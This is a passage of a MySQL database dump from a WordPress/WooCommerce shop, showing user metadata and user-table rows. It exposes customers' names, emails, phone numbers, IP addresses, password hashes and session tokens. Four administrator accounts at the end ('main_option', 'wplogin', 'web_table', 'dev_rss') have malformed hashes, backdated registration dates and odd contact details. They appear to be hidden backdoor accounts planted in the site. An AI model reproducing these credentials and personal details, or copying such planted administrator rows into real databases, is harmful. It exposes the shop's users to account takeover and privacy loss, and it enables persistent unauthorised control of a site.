07:31:18'),(1741,31,'arm_last_login_ip','171.76.80.77'),(1742,31,'wc_last_active','1679961600'),(1744,31,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1745,31,'session_tokens','a:2:{s:64:\"c675788c71c9ac4cc560b10648dcb13923b829bc5ecbd41f9e9a47b8d42c2dcc\";a:4:{s:10:\"expiration\";i:1680161478;s:2:\"ip\";s:12:\"171.76.80.77\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1679988678;}s:64:\"55439f4bb73c2209b7402d6aeeff3a0fe97d3f3f293caf94fe91875baffcd61f\";a:4:{s:10:\"expiration\";i:1680161478;s:2:\"ip\";s:12:\"171.76.80.77\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1679988678;}}'),(1747,31,'arm_firsttime_login','1'),(1748,3,'arm_last_login_date','2024-03-01 07:37:29'),(1749,3,'arm_last_login_ip','45.138.16.248'),(1752,32,'nickname','nithya'),(1753,32,'first_name','nithya'),(1754,32,'last_name','nj'),(1755,32,'description',''),(1756,32,'rich_editing','true'),(1757,32,'syntax_highlighting','true'),(1758,32,'comment_shortcuts','false'),(1759,32,'admin_color','fresh'),(1760,32,'use_ssl','0'),(1761,32,'show_admin_bar_front','true'),(1762,32,'locale',''),(1763,32,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1764,32,'wp_user_level','0'),(1765,32,'dismissed_wp_pointers',''),(1766,32,'last_update','1680088612'),(1767,32,'arm_primary_status','1'),(1768,32,'arm_secondary_status','0'),(1769,32,'form_random_key','101_VbOV68ZXaP'),(1770,32,'referral_url','https://gopalak.in/login/?restricted=page'),(1771,32,'arm_form_id','101'),(1772,32,'arm_nonce_check','3ade3eb5be'),(1773,32,'z22yhnjg',''),(1774,32,'form_type','registration'),(1775,32,'session_tokens','a:3:{s:64:\"7ec1e59746859c20e841268ca3eb6cf339c90b60805e08c070f45b4d8f03d2e8\";a:4:{s:10:\"expiration\";i:1680261412;s:2:\"ip\";s:13:\"115.99.140.48\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1680088612;}s:64:\"e2db0e464d6eb65d9380947ee976f0a49ce9302ae405be43e545ea926250b123\";a:4:{s:10:\"expiration\";i:1680261467;s:2:\"ip\";s:13:\"115.99.140.48\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1680088667;}s:64:\"ad1abfbe6ff5ef5e50bb2381356f763bd50d760e206f0171ac2af93f4d753c2b\";a:4:{s:10:\"expiration\";i:1680261467;s:2:\"ip\";s:13:\"115.99.140.48\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1680088667;}}'),(1776,32,'arm_last_login_date','2023-03-29 11:17:47'),(1777,32,'arm_last_login_ip','115.99.140.48'),(1778,32,'wc_last_active','1680048000'),(1780,32,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1782,32,'arm_firsttime_login','1'),(1784,4,'arm_last_login_date','2024-03-01 07:37:29'),(1785,4,'arm_last_login_ip','45.138.16.248'),(1797,5,'arm_last_login_date','2024-10-14 13:46:29'),(1798,5,'arm_last_login_ip','185.241.208.250'),(1824,33,'nickname','Pavi'),(1825,33,'first_name','Pavithra'),(1826,33,'last_name','M'),(1827,33,'description',''),(1828,33,'rich_editing','true'),(1829,33,'syntax_highlighting','true'),(1830,33,'comment_shortcuts','false'),(1831,33,'admin_color','fresh'),(1832,33,'use_ssl','0'),(1833,33,'show_admin_bar_front','true'),(1834,33,'locale',''),(1835,33,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1836,33,'wp_user_level','0'),(1837,33,'dismissed_wp_pointers',''),(1838,33,'last_update','1689657890'),(1839,33,'arm_primary_status','1'),(1840,33,'arm_secondary_status','0'),(1841,33,'form_random_key','101_glAq3Y7tiz'),(1842,33,'referral_url','https://gopalak.in/login/?restricted=page'),(1843,33,'arm_form_id','101'),(1844,33,'arm_nonce_check','dcf31e3bf7'),(1845,33,'7ddrzws9',''),(1846,33,'form_type','registration'),(1847,33,'session_tokens','a:1:{s:64:\"2008ebaa045ed8f37e4f4e6819f63971c3f390de2d681bc531b665cfabb1fc2a\";a:4:{s:10:\"expiration\";i:1689830690;s:2:\"ip\";s:13:\"106.193.58.32\";s:2:\"ua\";s:143:\"Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/114.0.5735.124 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1689657890;}}'),(1848,33,'arm_last_login_date','2023-07-18 05:24:50'),(1849,33,'arm_last_login_ip','106.193.58.32'),(1850,33,'wc_last_active','1689638400'),(1852,33,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1969,4,'_woocommerce_load_saved_cart_after_login','1'),(1970,3,'_woocommerce_load_saved_cart_after_login','1'),(1973,36,'nickname','donalddalton808'),(1974,36,'first_name',''),(1975,36,'last_name',''),(1976,36,'description',''),(1977,36,'rich_editing','true'),(1978,36,'syntax_highlighting','true'),(1979,36,'comment_shortcuts','false'),(1980,36,'admin_color','fresh'),(1981,36,'use_ssl','0'),(1982,36,'show_admin_bar_front','true'),(1983,36,'locale',''),(1984,36,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1985,36,'wp_user_level','0'),(1986,36,'_wc_order_attribution_source_type','typein'),(1987,36,'_wc_order_attribution_utm_source','(direct)'),(1988,36,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(1989,36,'_wc_order_attribution_session_start_time','2024-05-30 05:00:45'),(1990,36,'_wc_order_attribution_session_pages','2'),(1991,36,'_wc_order_attribution_session_count','1'),(1992,36,'_wc_order_attribution_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'),(1993,36,'_wc_order_attribution_device_type','Desktop'),(1994,36,'last_update','1728723025'),(1995,36,'session_tokens','a:1:{s:64:\"9961e5c50ae9ee477a0ba275e34b01bc7ea7868d2dcbeb8b93684a81dc841270\";a:4:{s:10:\"expiration\";i:1729932626;s:2:\"ip\";s:14:\"136.228.113.14\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1728723026;}}'),(1996,36,'wc_last_active','1728691200'),(1997,37,'nickname','lauragarcia808'),(1998,37,'first_name',''),(1999,37,'last_name',''),(2000,37,'description',''),(2001,37,'rich_editing','true'),(2002,37,'syntax_highlighting','true'),(2003,37,'comment_shortcuts','false'),(2004,37,'admin_color','fresh'),(2005,37,'use_ssl','0'),(2006,37,'show_admin_bar_front','true'),(2007,37,'locale',''),(2008,37,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2009,37,'wp_user_level','0'),(2010,37,'_wc_order_attribution_source_type','typein'),(2011,37,'_wc_order_attribution_utm_source','(direct)'),(2012,37,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(2013,37,'_wc_order_attribution_session_start_time','2024-05-30 05:00:45'),(2014,37,'_wc_order_attribution_session_pages','2'),(2015,37,'_wc_order_attribution_session_count','1'),(2016,37,'_wc_order_attribution_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'),(2017,37,'_wc_order_attribution_device_type','Desktop'),(2018,37,'last_update','1729160160'),(2019,37,'session_tokens','a:1:{s:64:\"0d60725ea3aef3ae4cfab16fc5408919bc5babd3041b39f100ee4145e4379baa\";a:4:{s:10:\"expiration\";i:1730369760;s:2:\"ip\";s:14:\"38.106.108.157\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1729160160;}}'),(2020,37,'wc_last_active','1729123200'),(2021,38,'nickname','jefferymarshall808'),(2022,38,'first_name',''),(2023,38,'last_name',''),(2024,38,'description',''),(2025,38,'rich_editing','true'),(2026,38,'syntax_highlighting','true'),(2027,38,'comment_shortcuts','false'),(2028,38,'admin_color','fresh'),(2029,38,'use_ssl','0'),(2030,38,'show_admin_bar_front','true'),(2031,38,'locale',''),(2032,38,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2033,38,'wp_user_level','0'),(2034,38,'_wc_order_attribution_source_type','typein'),(2035,38,'_wc_order_attribution_utm_source','(direct)'),(2036,38,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(2037,38,'_wc_order_attribution_session_start_time','2024-05-30 05:00:45'),(2038,38,'_wc_order_attribution_session_pages','2'),(2039,38,'_wc_order_attribution_session_count','1'),(2040,38,'_wc_order_attribution_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'),(2041,38,'_wc_order_attribution_device_type','Desktop'),(2042,38,'last_update','1729226085'),(2043,38,'session_tokens','a:1:{s:64:\"7bd6579ca10a1f09c923c57fa667dd24f6e69c1db07ad524945d6ec1a8e626ea\";a:4:{s:10:\"expiration\";i:1730435686;s:2:\"ip\";s:13:\"172.56.253.79\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1729226086;}}'),(2044,38,'wc_last_active','1729209600'),(2045,39,'nickname','melissawyatt808'),(2046,39,'first_name',''),(2047,39,'last_name',''),(2048,39,'description',''),(2049,39,'rich_editing','true'),(2050,39,'syntax_highlighting','true'),(2051,39,'comment_shortcuts','false'),(2052,39,'admin_color','fresh'),(2053,39,'use_ssl','0'),(2054,39,'show_admin_bar_front','true'),(2055,39,'locale',''),(2056,39,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2057,39,'wp_user_level','0'),(2058,39,'_wc_order_attribution_source_type','typein'),(2059,39,'_wc_order_attribution_utm_source','(direct)'),(2060,39,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(2061,39,'_wc_order_attribution_session_start_time','2024-05-30 05:00:45'),(2062,39,'_wc_order_attribution_session_pages','2'),(2063,39,'_wc_order_attribution_session_count','1'),(2064,39,'_wc_order_attribution_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'),(2065,39,'_wc_order_attribution_device_type','Desktop'),(2066,39,'last_update','1729679055'),(2067,39,'session_tokens','a:1:{s:64:\"5901528646b46317f23dca9636eb54a6f0f8fd214a4a693d6e3b578828f197e7\";a:4:{s:10:\"expiration\";i:1730888655;s:2:\"ip\";s:13:\"37.19.199.132\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1729679055;}}'),(2068,39,'wc_last_active','1729641600'),(2069,40,'nickname','christinewright808'),(2070,40,'first_name',''),(2071,40,'last_name',''),(2072,40,'description',''),(2073,40,'rich_editing','true'),(2074,40,'syntax_highlighting','true'),(2075,40,'comment_shortcuts','false'),(2076,40,'admin_color','fresh'),(2077,40,'use_ssl','0'),(2078,40,'show_admin_bar_front','true'),(2079,40,'locale',''),(2080,40,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2081,40,'wp_user_level','0'),(2082,40,'_wc_order_attribution_source_type','typein'),(2083,40,'_wc_order_attribution_utm_source','(direct)'),(2084,40,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(2085,40,'_wc_order_attribution_session_start_time','2024-05-30 05:00:45'),(2086,40,'_wc_order_attribution_session_pages','2'),(2087,40,'_wc_order_attribution_session_count','1'),(2088,40,'_wc_order_attribution_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36'),(2089,40,'_wc_order_attribution_device_type','Desktop'),(2090,40,'last_update','1729853732'),(2091,40,'session_tokens','a:1:{s:64:\"c598e30c7e22042aad8cf6ef9f78cfae61910a11fc3a7922fb85252b20784b8f\";a:4:{s:10:\"expiration\";i:1731063333;s:2:\"ip\";s:14:\"76.102.128.147\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1729853733;}}'),(2092,40,'wc_last_active','1729814400'),(2093,41,'nickname','anthonymiller808'),(2094,41,'first_name',''),(2095,41,'last_name',''),(2096,41,'description',''),(2097,41,'rich_editing','true'),(2098,41,'syntax_highlighting','true'),(2099,41,'comment_shortcuts','false'),(2100,41,'admin_color','fresh'),(2101,41,'use_ssl','0'),(2102,41,'show_admin_bar_front','true'),(2103,41,'locale',''),(2104,41,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2105,41,'wp_user_level','0'),(2106,41,'_wc_order_attribution_source_type','typein'),(2107,41,'_wc_order_attribution_utm_source','google'),(2108,41,'_wc_order_attribution_utm_medium','organic'),(2109,41,'_wc_order_attribution_session_entry','https://gopalak.in/my-account/'),(2110,41,'_wc_order_attribution_session_start_time','2024-10-30 11:37:53'),(2111,41,'_wc_order_attribution_session_pages','1'),(2112,41,'_wc_order_attribution_session_count','1'),(2113,41,'_wc_order_attribution_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36'),(2114,41,'_wc_order_attribution_device_type','Desktop'),(2115,41,'billing_phone','9712618271'),(2116,41,'last_update','1733484473'),(2117,41,'session_tokens','a:1:{s:64:\"ad26fdb23c26df61d10a535a375da796ebb10722d0151cae22fdfd4e6a462367\";a:4:{s:10:\"expiration\";i:1734694074;s:2:\"ip\";s:12:\"70.235.64.15\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv\": \"124.0) Gecko/20100101 Firefox/124.0\";s:5:\"login\";i:1733484474;}}'),(2118,41,'wc_last_active','1733443200'),(2119,42,'nickname','bikash.parida1992'),(2120,42,'first_name','Bikash Ranjan'),(2121,42,'last_name','Parida'),(2122,42,'description',''),(2123,42,'rich_editing','true'),(2124,42,'syntax_highlighting','true'),(2125,42,'comment_shortcuts','false'),(2126,42,'admin_color','fresh'),(2127,42,'use_ssl','0'),(2128,42,'show_admin_bar_front','true'),(2129,42,'locale',''),(2130,42,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2131,42,'wp_user_level','0'),(2132,42,'_wc_order_attribution_source_type','organic'),(2133,42,'_wc_order_attribution_referrer','https://www.google.com/'),(2134,42,'_wc_order_attribution_utm_source','google'),(2135,42,'_wc_order_attribution_utm_medium','organic'),(2136,42,'_wc_order_attribution_session_entry','https://gopalak.in/'),(2137,42,'_wc_order_attribution_session_start_time','2025-01-27 06:55:49'),(2138,42,'_wc_order_attribution_session_pages','2'),(2139,42,'_wc_order_attribution_session_count','1'),(2140,42,'_wc_order_attribution_user_agent','Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36'),(2141,42,'_wc_order_attribution_device_type','Mobile'),(2142,42,'billing_phone','7978498856'),(2143,42,'last_update','1737963020'),(2144,42,'session_tokens','a:1:{s:64:\"d5393ebed8e9ecf72439dc852a11c2a321670144850a2eb9f58d80c0fed0bb3d\";a:4:{s:10:\"expiration\";i:1739172436;s:2:\"ip\";s:12:\"106.216.79.2\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36\";s:5:\"login\";i:1737962836;}}'),(2145,42,'wc_last_active','1737936000'),(2146,42,'billing_first_name','Bikash Ranjan'),(2147,42,'billing_last_name','Parida'),(2148,42,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(2149,43,'nickname','hjain7446'),(2150,43,'first_name',''),(2151,43,'last_name',''),(2152,43,'description',''),(2153,43,'rich_editing','true'),(2154,43,'syntax_highlighting','true'),(2155,43,'comment_shortcuts','false'),(2156,43,'admin_color','fresh'),(2157,43,'use_ssl','0'),(2158,43,'show_admin_bar_front','true'),(2159,43,'locale',''),(2160,43,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2161,43,'wp_user_level','0'),(2162,43,'_wc_order_attribution_source_type','typein'),(2163,43,'_wc_order_attribution_utm_source','(direct)'),(2164,43,'_wc_order_attribution_session_entry','https://gopalak.in/'),(2165,43,'_wc_order_attribution_session_start_time','2025-02-27 15:05:14'),(2166,43,'_wc_order_attribution_session_pages','2'),(2167,43,'_wc_order_attribution_session_count','1'),(2168,43,'_wc_order_attribution_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1'),(2169,43,'_wc_order_attribution_device_type','Mobile'),(2170,43,'billing_phone','8950044444'),(2171,43,'last_update','1740670558'),(2172,43,'session_tokens','a:1:{s:64:\"aa498bf22ede390e0b9caf9159f6dd676b1fd2c14ef528c3c815d4f04eaad37e\";a:4:{s:10:\"expiration\";i:1741880158;s:2:\"ip\";s:14:\"106.196.40.172\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1740670558;}}'),(2173,43,'wc_last_active','1740614400'),(2174,44,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(2175,44,'wp_user_level','10'),(2176,45,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(2177,45,'wp_user_level','10'),(2178,46,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(2179,46,'wp_user_level','10'),(2180,47,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(2181,47,'wp_user_level','10');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT current_timestamp(),
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'sitemanager','$P$BNLjTMJnSkVrQm.PEcIRiMhDRuJzMg.','sitemanager','mango@homedirect.in','https://www.mangomitra.in','2022-01-24 07:19:21','',0,'sitemanager'),(2,'Alpha','$P$Bs2zmcHQs0m.lbKTym0sGpH9DYNOiK1','a','a@gmail.com','','2022-01-24 08:00:11','',0,'Alpha'),(3,'Beta','$P$Bp9pDOisdW.eNmx96dcp60hT8WZxAp/','beta','b@gmail.com','','2022-01-24 08:01:12','',0,'Beta'),(4,'Gamma','$P$BibnDZdZqqY1OuLogIExYwzoKFNMgO.','gamma','g@gmail.com','','2022-01-24 08:01:55','',0,'Gamma'),(5,'mercury','$P$BqYjA/YybkqB1dJbRxOl4E6fS86jZY.','m','mercury@gmail.com','','2022-01-28 10:11:01','',0,'mercury'),(6,'asd','$P$BOtZ.ikT8wCbrhmt4rBbA95fY07LSG0','asd','asd@gmail.com','','2022-01-31 04:53:11','1643604791:$P$Bnh8rDqU5YxXaQDeWDc9xycLuVEntV0',0,'asd'),(8,'Bhhuik','$P$BXRBmzLCs70d3F8GwQuDMhY.FrTVcE1','bhhuik','asjdj@gmail.com','','2022-02-02 08:24:08','1643790248:$P$BVs.lx7AXVW6blnLgLWV7DDDdRms5x/',0,'Bhhuik'),(11,'abcde','$P$BXvV3Y7i7IMPnFUerI6VrWX4LW4lIQ.','abcde','abcde@gmail.com','','2022-02-07 06:51:06','1644216667:$P$Bc/0ZSh0GTeXicV4X58AktMGu/GRyz.',0,'abcde'),(12,'nimyajose1011','$P$BIfOEvC4wcqVriSoTz8dIBfzV1P8zG/','nimyajose1011','nimyajose1011@gmail.com','','2022-02-08 04:35:42','1644294942:$P$BqIFjmci5EioJqO7DD1LDdtyb1Nfat1',0,'nimyajose1011'),(13,'1234','$P$BJkIo8bngcGJ/I/LoYS83DmeGnEfKx/','1234','1234@gmail.com','','2022-02-09 04:25:24','1644380724:$P$BOh8dviooGNMPqHhR5L.dpiVk9CzLd/',0,'1234'),(14,'venkateshavn','$P$BMLl8rTVB9fKprxq0kTyBctwYKthaY.','venkateshavn','venkateshavn@yahoo.com','','2022-02-15 07:15:37','',0,'venkateshavn'),(15,'Nimyajose10','$P$B7sGlLVEsJy8v8yJtMH4P56QbLjVLd.','njjo','Nimyajose10@gmail.com','','2022-02-17 11:51:17','1645768573:$P$BaC1NuwiEiKrQ5LKTUegqbnr5eoo541',0,'Nimyajose10'),(16,'4dm16ec024.nimyajose','$P$BET7Rwu2TXFKhdG7V5gPID88Patasv1','aqw','4dm16ec024.nimyajose@gmail.com','','2022-02-22 05:17:38','',0,'4dm16ec024.nimyajose'),(18,'archana','$P$BLkSHSRmAPyO.TlsJeERa6VHxKxqyI.','testing-store','archana@utfindia.in','','2022-02-23 11:55:01','',0,'archana'),(19,'Asdfghj','$P$BRcmCbFSw6AteP//.XIAUTjiYEYWMm1','mmm','Asdfghj@gmail.com','','2022-02-23 12:03:39','',0,'Asdfghj'),(20,'Pavitra','$P$BgC9MBAyoiR1Sqw.fYejpJgVhE59rD.','testingstore','Pavitra@utfindia.in','','2022-02-23 12:10:13','',0,'Pavitra'),(21,'bhavani','$P$B1MTHeE/OBMmPekz/zpBLOoKs7I4h6.','mainstore','bhavani@utfindia.in','','2022-02-24 05:09:52','',0,'bhavani'),(22,'chethan','$P$BW.SZvSUz6E92l8w0V.y4luJlIJXi6/','test-store-6','chethan@utfinadia.in','','2022-02-24 09:40:33','',0,'chethan'),(23,'sarchana1298','$P$Bef1x4lSSxebAWfCpHQfCSS/03gwf7.','sarchana1298','sarchana1298@gmail.com','','2022-02-24 11:09:53','1645700993:$P$BIXGd8TBVmHCLhRPrIHwQSVqmydKnN/',0,'sarchana1298'),(24,'prajwal','$P$BqbQ.whQHh5N3.HZUX6b55c6ZfCmc2.','prajwal','prajwal@gmail.com','','2022-02-24 13:48:31','1645710511:$P$B.1oFMvjUm6L8WnwUm2ESpLYSiCXRj1',0,'prajwal'),(25,'xyzabc9980','$P$BxJ.UIFdKVqVVIXVvR91WqKk9xEanS/','xyz','xyzabc9980@gmail.com','','2022-03-03 05:15:18','',0,'xyzabc9980'),(26,'nijo101196','$P$BDdv6Je25rawbAViBQ.fHZNho41eAg.','nijo101196','nijo101196@gmail.com','','2022-03-07 06:16:33','1646633793:$P$BzAPNmREb41kQqpbHlLKyYO66lHaUF/',0,'nijo101196'),(27,'rakshithasj1999','$P$BhKWa5af2iwa2BK7Qi.YYMAYNrgFV3/','rakshithasj1999','rakshithasj1999@gmail.com','','2022-03-14 04:58:50','1647233930:$P$BrOm/f5AMUvIJRPj2deOwBWhLeT1qv1',0,'rakshithasj1999'),(28,'utftech9','$P$Bz8gqaVlIIhjkMQxcGQ9GlPbeI7cfy1','utftech','utftech9@gmail.com','','2022-03-15 07:15:44','',0,'utftech9'),(29,'utfhr.333','$P$BxBE6qV/MrO.silmsFmqZ2WFfHGVIZ0','utfhr-333','utfhr.333@gmail.com','','2022-03-15 07:40:31','1647330031:$P$B5Qvyh27jHGZ3jUlLgk2fXqvxYBgb9/',0,'utfhr.333'),(30,'pavvitra','$P$BCPw8GW9GFKE2hlZ9ahBhZBNcNEiHw0','pavvitra','pavvitra@gmail.com','','2022-03-18 15:56:06','1647618966:$P$BnwascdKKvruCBkrX9SmS9Jd3gJoKX1',0,'pavvitra'),(31,'nimya','$P$BIlnF2vDyNZObNK56nGZa7.fX2vkMw1','nimya','nimya@vividhity.com','','2023-03-28 07:30:33','1679988636:$P$B4iycT2vVMUOBimeii7ehOvMaOgsru/',0,'nimya jose'),(32,'nithya','$P$BBxWyp/iS.sl1Go5DFZ3O/XJUSXSp8.','nithya','nithya@gmail.com','','2023-03-29 11:16:51','1680088612:$P$BXoz9lwYXnwvQ4zteVrDrrAOrz/lHo1',0,'nithya nj'),(33,'Pavi','$P$BVuq.PGkhHbLdSUIjm2U0vh0pnq0Xw0','pavi','Pavim123@gmail.com','','2023-07-18 05:24:49','1689657890:$P$BYp3PAHruEanbY8eQiz3KwSH65FP7J0',0,'Pavithra M'),(36,'donalddalton808','$P$BMHShtmxZhE4cOSqNTohaag9Rfz8hd0','donalddalton808','DonaldDalton808@gmail.com','','2024-10-12 08:50:25','1728723025:$P$BU5Uq.Dsj1sQ6NeYq1fFwjgqTdvf.51',0,'donalddalton808'),(37,'lauragarcia808','$P$Bgk0aZlCpI3.5EEqv/HquGAnSCa3zN/','lauragarcia808','LauraGarcia808@gmail.com','','2024-10-17 10:15:59','1729160160:$P$Bk0O1IOJwnkXNh9cbNBVOlzDNZnQPl1',0,'lauragarcia808'),(38,'jefferymarshall808','$P$B/pvyzWWbtMWr1YdNq5Xarfd6Gb5Wz1','jefferymarshall808','JefferyMarshall808@gmail.com','','2024-10-18 04:34:45','1729226085:$P$BRn.aOCsjvQ4TrdKV1j5XZKn5aie8Y/',0,'jefferymarshall808'),(39,'melissawyatt808','$P$B6jMSynumSB4p73mMjcRjKkrbjXcKR1','melissawyatt808','MelissaWyatt808@gmail.com','','2024-10-23 10:24:14','1729679055:$P$B/gMVQLkWemHfxSIIYIDQfNxRVHuDb/',0,'melissawyatt808'),(40,'christinewright808','$P$BOZBSBg7KAUFGVcgd9dRKBKPmWA1R20','christinewright808','ChristineWright808@gmail.com','','2024-10-25 10:55:32','1729853732:$P$BvIhIrZ215TXu1KiL0.4tOIPTZa0TI/',0,'christinewright808'),(41,'anthonymiller808','$P$BuglKYN2UexNDoCPhrIGQfJc5KqzKh0','anthonymiller808','anthonymiller808@gmail.com','','2024-12-06 11:27:53','1733484473:$P$BhmHlxC/AvNymrl.CMOYh/Dsc4ksAY/',0,'anthonymiller808'),(42,'bikash.parida1992','$P$B.WtGasBYdpoAT9bQijcBl51vl4hS8.','bikash-parida1992','bikash.parida1992@gmail.com','','2025-01-27 07:27:15','1737962835:$P$B.BJuyx/9bBHp0o/oam1lA9PE.sj9G/',0,'bikash Parida'),(43,'hjain7446','$P$Bc4mhfN7.e5IIN8fmIWHmIZiaGmk4p0','hjain7446','hjain7446@gmail.com','','2025-02-27 15:35:58','1740670558:$P$BbBFb07n35shvm/t93yWjIs0oQ6qg41',0,'hjain7446'),(44,'main_option','$P$77n.uvhGiHvGn.6p4e7aeU7lGO/y2G1','main_option','','https://wordpress.com','2020-11-29 15:17:17','',0,'main_option'),(45,'wplogin','$P$7BoP5gwx4EPtFerrISPgr6rBHbH2rN1','wplogin','polyanitsya2022@rambler.ru','https://wordpress.com','2019-11-30 05:45:42','',0,'wplogin'),(46,'web_table','$P$7084./JZhxrcvZGrsqIiRdLxQ/135b0','web_table','','https://wordpress.com','2021-05-05 20:39:43','',0,'web_table'),(47,'dev_rss','$P$70hdphLyyBcj0vIqGh.Cc7M6JXPRo31','dev_rss','','https://wordpress.com','2022-01-02 23:52:29','',0,'dev_rss');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_admin_note_actions`
--

DROP TABLE IF EXISTS `wp_wc_admin_note_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_admin_note_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `note_id` bigint(20) unsigned NOT NULL,
  `name` varchar(255) NOT NULL,
  `label` varchar(255) NOT NULL,
  `query` longtext NOT NULL,
